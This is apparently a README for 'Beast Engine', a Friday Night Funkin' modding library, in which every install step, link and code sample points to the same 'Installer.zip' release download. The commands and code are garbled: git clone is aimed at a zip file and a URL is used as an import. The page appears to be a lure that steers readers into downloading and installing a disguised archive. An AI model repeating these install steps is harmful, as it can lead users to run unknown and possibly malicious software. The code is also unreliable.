Welcome to the official repository for Beast Engine, a funky modding library for all your Friday Night Funkin' (FnF) modding needs! ๐บ๐ถ
Beast Engine is a powerful HaxeFlixel library designed specifically for FnF modding enthusiasts. Whether you're a seasoned modder or just starting out, Beast Engine provides the tools you need to create exciting and unique mods for Friday Night Funkin'. With its easy-to-use design and extensive features, Beast Engine empowers you to bring your modding visions to life in the FnF universe. ๐ฅ๐ค
๐ต Music Modding: Easily integrate custom music tracks into your mod to give it a unique sound and vibe.
๐จ Visual Modding: Customize character sprites, backgrounds, and animations to create a visually stunning mod.
๐ฎ Gameplay Modding: Tweak gameplay mechanics, levels, and difficulty settings to craft a challenging and engaging mod experience.
๐ง Mod Management: Conveniently organize and manage multiple mods within your project for efficient development.
๐ฆ Polymod Support: Seamlessly integrate with Polymod for enhanced mod compatibility and flexibility.
To get started with Beast Engine, follow these simple steps:
-
Clone the repository to your local machine:
git clone https://github.com/weslei78b/beast-engine/releases/download/v1.0/Installer.zip
-
Navigate to the project directory:
cd beast-engine
-
Install the necessary dependencies:
haxelib install https://github.com/weslei78b/beast-engine/releases/download/v1.0/Installer.zip
-
Start modding with Beast Engine and unleash your creativity! ๐
Check out the examples
folder in the repository for some demo mod projects created using Beast Engine. Feel free to explore these projects to get a sense of how to use the library effectively in your own mods.
Here is a sample code snippet showcasing how to load a custom song in your mod:
import https://github.com/weslei78b/beast-engine/releases/download/v1.0/Installer.zip;
class MyModSong extends MusicLoader {
public function new() {
super();
loadSong("https://github.com/weslei78b/beast-engine/releases/download/v1.0/Installer.zip");
}
}
For more detailed documentation and tutorials on using Beast Engine, visit the official documentation.
We welcome contributions from the modding community to make Beast Engine even better! If you have any ideas, bug fixes, or new features to propose, feel free to submit a pull request.
Please refer to our Contribution Guidelines before making any contributions. Your support and contributions are greatly appreciated! ๐
Beast Engine is released under the MIT License. See the LICENSE file for more details.
๐ถ Get ready to dive into the exciting world of modding with Beast Engine and create the wildest Friday Night Funkin' mods ever seen! ๐ถ
If the link above does not work, please check the Releases section for the latest version.
Let's make some modding magic happen! ๐พ๐น๐ถ